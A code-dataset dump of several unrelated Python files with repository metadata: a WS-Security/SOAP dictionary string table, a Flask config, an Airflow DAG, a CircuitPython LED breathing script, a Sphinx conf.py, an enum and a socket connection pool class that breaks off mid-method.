0x134: "http://www.w3.org/2001/04/xmlenc#rsa-1_5",
0x136: "http://www.w3.org/2000/09/xmldsig#sha1",
0x138: "http://www.w3.org/2001/04/xmlenc#sha256",
0x13A: "http://www.w3.org/2001/04/xmlenc#sha512",
0x13C: "http://www.w3.org/2001/04/xmlenc#tripledes-cbc",
0x13E: "http://www.w3.org/2001/04/xmlenc#kw-tripledes",
0x140: "http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap",
0x142: "http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap",
0x144: "http://schemas.microsoft.com/ws/2006/05/security",
0x146: "dnse",
0x148: "o",
0x14A: "Password",
0x14C: "PasswordText",
0x14E: "Username",
0x150: "UsernameToken",
0x152: "BinarySecurityToken",
0x154: "EncodingType",
0x156: "KeyIdentifier",
0x158: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary",
0x15A: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary",
0x15C: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text",
0x15E: "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifier",
0x160: "http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ",
0x162: "http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510",
0x164: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID",
0x166: "Assertion",
0x168: "urn:oasis:names:tc:SAML:1.0:assertion",
0x16A: "http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license",
0x16C: "FailedAuthentication",
0x16E: "InvalidSecurityToken",
0x170: "InvalidSecurity",
0x172: "k",
0x174: "SignatureConfirmation",
0x176: "TokenType",
0x178: "http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1",
0x17A: "http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey",
0x17C: "http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1",
0x17E: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1",
0x180: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0",
0x182: "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID",
0x184: "AUTH-HASH",
0x186: "RequestSecurityTokenResponse",
0x188: "KeySize",
0x18A: "RequestedTokenReference",
0x18C: "AppliesTo",
0x18E: "Authenticator",
0x190: "CombinedHash",
0x192: "BinaryExchange",
0x194: "Lifetime",
0x196: "RequestedSecurityToken",
0x198: "Entropy",
0x19A: "RequestedProofToken",
0x19C: "ComputedKey",
0x19E: "RequestSecurityToken",
0x1A0: "RequestType",
0x1A2: "Context",
0x1A4: "BinarySecret",
0x1A6: "http://schemas.xmlsoap.org/ws/2005/02/trust/spnego",
0x1A8: "http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego",
0x1AA: "wst",
0x1AC: "http://schemas.xmlsoap.org/ws/2004/04/trust",
0x1AE: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue",
0x1B0: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue",
0x1B2: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue",
0x1B4: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1",
0x1B6: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey",
0x1B8: "http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce",
0x1BA: "KeyType",
0x1BC: "http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey",
0x1BE: "http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey",
0x1C0: "Claims",
0x1C2: "InvalidRequest",
0x1C4: "RequestFailed",
0x1C6: "SignWith",
0x1C8: "EncryptWith",
0x1CA: "EncryptionAlgorithm",
0x1CC: "CanonicalizationAlgorithm",
0x1CE: "ComputedKeyAlgorithm",
0x1D0: "UseKey",
0x1D2: "http://schemas.microsoft.com/net/2004/07/secext/WS-SPNego",
0x1D4: "http://schemas.microsoft.com/net/2004/07/secext/TLSNego",
0x1D6: "t",
0x1D8: "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue",
0x1DA: "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue",
0x1DC: "http://schemas.xmlsoap.org/ws/2005/02/trust/Issue",
0x1DE: "http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey",
0x1E0: "http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1",
0x1E2: "http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce",
0x1E4: "RenewTarget",
0x1E6: "CancelTarget",
0x1E8: "RequestedTokenCancelled",
0x1EA: "RequestedAttachedReference",
0x1EC: "RequestedUnattachedReference",
0x1EE: "IssuedTokens",
0x1F0: "http://schemas.xmlsoap.org/ws/2005/02/trust/Renew",
0x1F2: "http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel",
0x1F4: "http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey",
0x1F6: "Access",
0x1F8: "AccessDecision",
0x1FA: "Advice",
0x1FC: "AssertionID",
0x1FE: "AssertionIDReference",
0x200: "Attribute",
0x202: "AttributeName",
0x204: "AttributeNamespace",
0x206: "AttributeStatement",
0x208: "AttributeValue",
0x20A: "Audience",
0x20C: "AudienceRestrictionCondition",
0x20E: "AuthenticationInstant",
0x210: "AuthenticationMethod",
0x212: "AuthenticationStatement",
0x214: "AuthorityBinding",
0x216: "AuthorityKind",
0x218: "AuthorizationDecisionStatement",
0x21A: "Binding",
0x21C: "Condition",
0x21E: "Conditions",
0x220: "Decision",
0x222: "DoNotCacheCondition",
0x224: "Evidence",
0x226: "IssueInstant",
0x228: "Issuer",
0x22A: "Location",
0x22C: "MajorVersion",
0x22E: "MinorVersion",
0x230: "NameIdentifier",
0x232: "Format",
0x234: "NameQualifier",
0x236: "Namespace",
0x238: "NotBefore",
0x23A: "NotOnOrAfter",
0x23C: "saml",
0x23E: "Statement",
0x240: "Subject",
0x242: "SubjectConfirmation",
0x244: "SubjectConfirmationData",
0x246: "ConfirmationMethod",
0x248: "urn:oasis:names:tc:SAML:1.0:cm:holder-of-key",
0x24A: "urn:oasis:names:tc:SAML:1.0:cm:sender-vouches",
0x24C: "SubjectLocality",
0x24E: "DNSAddress",
0x250: "IPAddress",
0x252: "SubjectStatement",
0x254: "urn:oasis:names:tc:SAML:1.0:am:unspecified",
0x256: "xmlns",
0x258: "Resource",
0x25A: "UserName",
0x25C: "urn:oasis:names:tc:SAML:1.1:nameid-format:WindowsDomainQualifiedName",
0x25E: "EmailName",
0x260: "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress",
0x262: "u",
0x264: "ChannelInstance",
0x266: "http://schemas.microsoft.com/ws/2005/02/duplex",
0x268: "Encoding",
0x26A: "MimeType",
0x26C: "CarriedKeyName",
0x26E: "Recipient",
0x270: "EncryptedKey",
0x272: "KeyReference",
0x274: "e",
0x276: "http://www.w3.org/2001/04/xmlenc#Element",
0x278: "http://www.w3.org/2001/04/xmlenc#Content",
0x27A: "KeyName",
0x27C: "MgmtData",
0x27E: "KeyValue",
0x280: "RSAKeyValue",
0x282: "Modulus",
0x284: "Exponent",
0x286: "X509Data",
0x288: "X509IssuerSerial",
0x28A: "X509IssuerName",
0x28C: "X509SerialNumber",
0x28E: "X509Certificate",
0x290: "AckRequested",
0x292: "http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested",
0x294: "AcksTo",
0x296: "Accept",
0x298: "CreateSequence",
0x29A: "http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence",
0x29C: "CreateSequenceRefused",
0x29E: "CreateSequenceResponse",
0x2A0: "http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse",
0x2A2: "FaultCode",
0x2A4: "InvalidAcknowledgement",
0x2A6: "LastMessage",
0x2A8: "http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage",
0x2AA: "LastMessageNumberExceeded",
0x2AC: "MessageNumberRollover",
0x2AE: "Nack",
0x2B0: "netrm",
0x2B2: "Offer",
0x2B4: "r",
0x2B6: "SequenceFault",
0x2B8: "SequenceTerminated",
0x2BA: "TerminateSequence",
0x2BC: "http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence",
0x2BE: "UnknownSequence",
0x2C0: "http://schemas.microsoft.com/ws/2006/02/tx/oletx",
0x2C2: "oletx",
0x2C4: "OleTxTransaction",
0x2C6: "PropagationToken",
0x2C8: "http://schemas.xmlsoap.org/ws/2004/10/wscoor",
0x2CA: "wscoor",
0x2CC: "CreateCoordinationContext",
0x2CE: "CreateCoordinationContextResponse",
0x2D0: "CoordinationContext",
0x2D2: "CurrentContext",
0x2D4: "CoordinationType",
0x2D6: "RegistrationService",
0x2D8: "Register",
0x2DA: "RegisterResponse",
0x2DC: "ProtocolIdentifier",
0x2DE: "CoordinatorProtocolService",
0x2E0: "ParticipantProtocolService",
0x2E2: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext",
0x2E4: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse",
0x2E6: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register",
0x2E8: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse",
0x2EA: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault",
0x2EC: "ActivationCoordinatorPortType",
0x2EE: "RegistrationCoordinatorPortType",
0x2F0: "InvalidState",
0x2F2: "InvalidProtocol",
0x2F4: "InvalidParameters",
0x2F6: "NoActivity",
0x2F8: "ContextRefused",
0x2FA: "AlreadyRegistered",
0x2FC: "http://schemas.xmlsoap.org/ws/2004/10/wsat",
0x2FE: "wsat",
0x300: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion",
0x302: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC",
0x304: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC",
0x306: "Prepare",
0x308: "Prepared",
0x30A: "ReadOnly",
0x30C: "Commit",
0x30E: "Rollback",
0x310: "Committed",
0x312: "Aborted",
0x314: "Replay",
0x316: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit",
0x318: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback",
0x31A: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed",
0x31C: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted",
0x31E: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare",
0x320: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared",
0x322: "http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly",
0x324: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay",
0x326: "http://schemas.xmlsoap.org/ws/2004/10/wsat/fault",
0x328: "CompletionCoordinatorPortType",
0x32A: "CompletionParticipantPortType",
0x32C: "CoordinatorPortType",
0x32E: "ParticipantPortType",
0x330: "InconsistentInternalState",
0x332: "mstx",
0x334: "Enlistment",
0x336: "protocol",
0x338: "LocalTransactionId",
0x33A: "IsolationLevel",
0x33C: "IsolationFlags",
0x33E: "Description",
0x340: "Loopback",
0x342: "RegisterInfo",
0x344: "ContextId",
0x346: "TokenId",
0x348: "AccessDenied",
0x34A: "InvalidPolicy",
0x34C: "CoordinatorRegistrationFailed",
0x34E: "TooManyEnlistments",
0x350: "Disabled",
0x352: "ActivityId",
0x354: "http://schemas.microsoft.com/2004/09/ServiceModel/Diagnostics",
0x356: "http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1",
0x358: "http://schemas.xmlsoap.org/ws/2002/12/policy",
0x35A: "FloodMessage",
0x35C: "LinkUtility",
0x35E: "Hops",
0x360: "http://schemas.microsoft.com/net/2006/05/peer/HopCount",
0x362: "PeerVia",
0x364: "http://schemas.microsoft.com/net/2006/05/peer",
0x366: "PeerFlooder",
0x368: "PeerTo",
0x36A: "http://schemas.microsoft.com/ws/2005/05/routing",
0x36C: "PacketRoutable",
0x36E: "http://schemas.microsoft.com/ws/2005/05/addressing/none",
0x370: "http://schemas.microsoft.com/ws/2005/05/envelope/none",
0x372: "http://www.w3.org/2001/XMLSchema-instance",
0x374: "http://www.w3.org/2001/XMLSchema",
0x376: "nil",
0x378: "type",
0x37A: "char",
0x37C: "boolean",
0x37E: "byte",
0x380: "unsignedByte",
0x382: "short",
0x384: "unsignedShort",
0x386: "int",
0x388: "unsignedInt",
0x38A: "long",
0x38C: "unsignedLong",
0x38E: "float",
0x390: "double",
0x392: "decimal",
0x394: "dateTime",
0x396: "string",
0x398: "base64Binary",
0x39A: "anyType",
0x39C: "duration",
0x39E: "guid",
0x3A0: "anyURI",
0x3A2: "QName",
0x3A4: "time",
0x3A6: "date",
0x3A8: "hexBinary",
0x3AA: "gYearMonth",
0x3AC: "gYear",
0x3AE: "gMonthDay",
0x3B0: "gDay",
0x3B2: "gMonth",
0x3B4: "integer",
0x3B6: "positiveInteger",
0x3B8: "negativeInteger",
0x3BA: "nonPositiveInteger",
0x3BC: "nonNegativeInteger",
0x3BE: "normalizedString",
0x3C0: "ConnectionLimitReached",
0x3C2: "http://schemas.xmlsoap.org/soap/envelope/",
0x3C4: "actor",
0x3C6: "faultcode",
0x3C8: "faultstring",
0x3CA: "faultactor",
0x3CC: "detail",
}
inverted_dict = {v: k for (k, v) in dictionary.items()}
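# --- usage sketch (illustrative only, not part of the original module): the
# table above maps numeric record ids to dictionary strings, and inverted_dict
# gives the reverse lookup, e.g. a round trip for the "Register" entry:
assert dictionary[0x2D8] == "Register"
assert inverted_dict["Register"] == 0x2D8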
| 39.398077 | 117 | 0.667496 |
4a1b44c80a7838e89c0d8a8043667dc1f424644b
| 149 |
py
|
Python
|
config.py
|
robk-dev/bunnies
|
6116f7ee8496c582422370a68f99707f46071ce7
|
[
"MIT"
] | null | null | null |
config.py
|
robk-dev/bunnies
|
6116f7ee8496c582422370a68f99707f46071ce7
|
[
"MIT"
] | null | null | null |
config.py
|
robk-dev/bunnies
|
6116f7ee8496c582422370a68f99707f46071ce7
|
[
"MIT"
] | null | null | null |
import os
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'super-secret'
MONGODB_SETTINGS = { 'db': 'bunnies' }
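# --- usage sketch (an assumption for illustration, not part of this file):
# a config class like this is typically handed to a Flask app, whose
# flask-mongoengine extension reads the MONGODB_SETTINGS key.
if __name__ == '__main__':
    from flask import Flask
    app = Flask(__name__)
    app.config.from_object(Config)
    print(app.config['MONGODB_SETTINGS'])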
| 21.285714 | 63 | 0.637584 |
4a1b45b15c81e790ad41960a6fbc3d5459341b92
| 1,406 |
py
|
Python
|
examples/src/dbnd_examples/dbnd_airflow/scheduled_dbnd_check.py
|
turbaszek/dbnd
|
6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0
|
[
"Apache-2.0"
] | null | null | null |
examples/src/dbnd_examples/dbnd_airflow/scheduled_dbnd_check.py
|
turbaszek/dbnd
|
6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0
|
[
"Apache-2.0"
] | null | null | null |
examples/src/dbnd_examples/dbnd_airflow/scheduled_dbnd_check.py
|
turbaszek/dbnd
|
6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0
|
[
"Apache-2.0"
] | null | null | null |
"""
Code that goes along with the Airflow tutorial located at:
https://github.com/airbnb/airflow/blob/master/airflow/example_dags/tutorial.py
"""
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from dbnd.tasks.basics import dbnd_sanity_check
from dbnd_airflow_operator.dbnd_cmd_operators import dbnd_task_as_bash_operator
default_args = {
"owner": "airflow",
"depends_on_past": False,
"start_date": datetime.now(),
"schedule_interval": timedelta(minutes=1),
"email": ["airflow@example.com"],
"email_on_failure": False,
"email_on_retry": False,
"retries": 1,
"retry_delay": timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
with DAG("scheduled_dbnd_check", default_args=default_args) as dag:
templated_command = (
"dbnd run dbnd_sanity_check --task-target-date {{ ds }} "
"--name {{ params.my_param }}"
)
BashOperator(
task_id="run_dbnd_check",
bash_command=templated_command,
params={"my_param": "name_from_params"},
dag=dag,
)
every_minute = dbnd_task_as_bash_operator(
dbnd_sanity_check,
name="dbnd_check_every_minute",
schedule_interval=timedelta(minutes=2),
default_args=default_args,
)
print(every_minute)
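# --- illustrative note (the rendering shown is an assumption, not output
# captured from this DAG): after Jinja templating, the bash_command above
# expands to something like
#   dbnd run dbnd_sanity_check --task-target-date 2021-01-01 --name name_from_params
# where {{ ds }} is the execution date stamp Airflow injects at run time.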
| 28.12 | 79 | 0.70128 |
4a1b468feda12882dbb000cd1f91567ff4924e26
| 8,290 |
py
|
Python
|
doc/conf.py
|
nwu63/pyhyp
|
d29715f509c7c460d6705183301eda14da217755
|
[
"Apache-2.0"
] | null | null | null |
doc/conf.py
|
nwu63/pyhyp
|
d29715f509c7c460d6705183301eda14da217755
|
[
"Apache-2.0"
] | null | null | null |
doc/conf.py
|
nwu63/pyhyp
|
d29715f509c7c460d6705183301eda14da217755
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# pyHyp documentation build configuration file, created by
# sphinx-quickstart on Sun Oct 13 13:46:01 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../python'))
#sys.path.insert(0, os.path.abspath('./fort_py_doc'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx',
'sphinx.ext.todo', 'sphinx.ext.coverage',
'sphinx.ext.pngmath', 'sphinx.ext.viewcode']#,'numpydoc']
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pyHyp'
copyright = u'2013, Dr. Gaetan Kenway'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'development'
# The full version, including alpha/beta/rc tags.
release = 'development'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'sphinx'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['themes']
html_theme = 'mdolab_theme'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyHypdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pyHyp.tex', u'pyHyp Documentation',
u'Dr. Gaetan Kenway', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyhyp', u'pyHyp Documentation',
[u'Dr. Gaetan Kenway'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyHyp', u'pyHyp Documentation',
u'Dr. Gaetan Kenway', 'pyHyp', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
## fortran_src = ['../src/modules/hypData.F90','../src/3D/3D_code.F90']
# fortran_src = ['../src/3D/3D_code.F90']
# fortran_ext = ['.F90']
| 32.382813 | 80 | 0.710615 |
4a1b471e07d2e24dfc4c2f1555b8f4412fd44d90
| 731 |
py
|
Python
|
breathe.py
|
electric-blue-green/trinket
|
82e1e265934252c0cf3b2fa72f9bc1d60a35ac93
|
[
"Unlicense"
] | 1 |
2021-06-05T03:12:36.000Z
|
2021-06-05T03:12:36.000Z
|
breathe.py
|
aejb/trinket
|
82e1e265934252c0cf3b2fa72f9bc1d60a35ac93
|
[
"Unlicense"
] | 1 |
2018-02-26T11:22:50.000Z
|
2018-02-26T11:22:50.000Z
|
breathe.py
|
electric-blue-green/trinket
|
82e1e265934252c0cf3b2fa72f9bc1d60a35ac93
|
[
"Unlicense"
] | null | null | null |
import board
import busio
import time
dotstar = busio.SPI(board.APA102_SCK, board.APA102_MOSI)
colors = [0, 0, 0]
print("INIT") ## REPL
def setPixel(red, green, blue):
if not dotstar.try_lock():
return
#print("setting pixel to: %d %d %d" % (red, green, blue))
    # APA102 frame: 4-byte start frame of zeros, one LED frame (0xff = full
    # global brightness, then blue, green, red), and an all-0xff end frame.
    dotstar.write(bytearray([0x00, 0x00, 0x00, 0x00, 0xff, blue, green, red, 0xff, 0xff, 0xff, 0xff]))
dotstar.unlock()
time.sleep(0.01)
while True:
for i in range(0,255):
colors[1] += 1
print(colors)
time.sleep(0.01)
setPixel(colors[0], colors[1], colors[2])
for i in range(255,0,-1):
colors[1] -= 1
print(colors)
time.sleep(0.03)
setPixel(colors[0], colors[1], colors[2])
| 28.115385 | 102 | 0.597811 |
4a1b48853d3f335a9c96cdafd48519f4b31d2ac0
| 413 |
py
|
Python
|
src/sima/riflex/hydrodynamicinputcode.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/riflex/hydrodynamicinputcode.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/riflex/hydrodynamicinputcode.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
# Generated with HydrodynamicInputCode
#
from enum import Enum
from enum import auto
class HydrodynamicInputCode(Enum):
""""""
DIMENSIONAL = auto()
NONDIMENSIONAL = auto()
def label(self):
if self == HydrodynamicInputCode.DIMENSIONAL:
return "Dimensional coefficients"
if self == HydrodynamicInputCode.NONDIMENSIONAL:
return "Nondimensional coefficients"
| 27.533333 | 56 | 0.690073 |
4a1b489aa6a453aebba6d32349e866ec473d2d09
| 8,459 |
py
|
Python
|
src/socketclient/SocketPool.py
|
TKaxv-7S/jd-assistant
|
426940efa4254246e9eb85e32fc81f8b3728f323
|
[
"MIT"
] | 16 |
2020-12-17T11:19:38.000Z
|
2022-02-17T06:03:34.000Z
|
src/socketclient/SocketPool.py
|
JackMa777/jd-assistant
|
426940efa4254246e9eb85e32fc81f8b3728f323
|
[
"MIT"
] | null | null | null |
src/socketclient/SocketPool.py
|
JackMa777/jd-assistant
|
426940efa4254246e9eb85e32fc81f8b3728f323
|
[
"MIT"
] | 4 |
2020-12-04T05:06:14.000Z
|
2021-12-28T09:03:24.000Z
|
# -*- coding: utf-8 -*-
import time
from socketclient.Connector import Connector
from socketclient.log import logger
class SocketPool(object):
"""Pool of socket connections"""
def __init__(self, conn_factory, backend_mod=None,
host=None, port=80, active_count=3, max_count=10):
self.conn_factory = conn_factory
self.host = host
self.port = port
self.active_count = active_count
self.max_count = max_count
self.backend_mod = backend_mod
self.import_queue = getattr(backend_mod, 'queue')
self.pool = self.import_queue.Queue(max_count)
for i in range(active_count):
try:
new_connect = conn_factory(host, port, backend_mod, True)
if new_connect.is_connected():
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
logger.error("队列已满")
break
except Exception as e:
                logger.error('Failed to create new connection, host: %s, port: %s, error: %s', host, port, e)
static_count = max_count - active_count
if static_count > 0:
for i in range(static_count):
try:
new_connect = conn_factory(host, port, backend_mod)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
logger.error("队列已满")
break
except Exception as e:
                    logger.error('Failed to create new connection, host: %s, port: %s, error: %s', host, port, e)
self.sem = self.backend_mod.Semaphore(1)
    # Deprecated logic
# def is_valid_connect(self, conn: Connector, verify_time=time.time(), verify_interval_time=0):
# if conn.is_connected():
# if conn.is_connecting():
# interval_time = conn.connect_time() + self.life_time - verify_time
# if interval_time > 0:
# if interval_time - verify_interval_time < 0:
# conn.keep_connect(verify_time)
# return True
# else:
# return False
# else:
# return False
# return not conn.is_closed()
@staticmethod
def verify_connect(conn: Connector, verify_time=time.time()):
if not conn:
return False
elif conn.is_valid(verify_time):
return True
else:
conn.invalidate()
return False
def verify_all(self):
active_count = 0
now = time.time()
for i in range(self.max_count):
conn = None
try:
conn = self.pool.get_nowait()
if self.verify_connect(conn, now):
if conn.is_connected():
active_count += 1
elif self.active_count > active_count:
                        # Keep the number of active connections in line with active_count
conn.connect()
active_count += 1
self.pool.put_nowait(conn)
except self.import_queue.Empty:
break
except self.import_queue.Full:
break
except Exception as e:
logger.error("异常信息:%s", e)
if conn:
conn.invalidate()
        # Afterwards the queue must hold max_count connections; create more if it falls short
left_count = self.max_count - self.pool.qsize()
if active_count >= self.active_count:
for i in range(left_count):
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
break
except Exception as e:
                    logger.error('Failed to create new connection, host: %s, port: %s, error: %s', self.host, self.port, e)
else:
left_active_count = self.active_count - active_count
left_static_count = left_count - left_active_count
            # Enough capacity left
if left_static_count >= 0:
for i in range(left_active_count):
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod, True)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
break
except Exception as e:
                        logger.error('Failed to create new connection, host: %s, port: %s, error: %s', self.host, self.port, e)
for i in range(left_static_count):
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
break
except Exception as e:
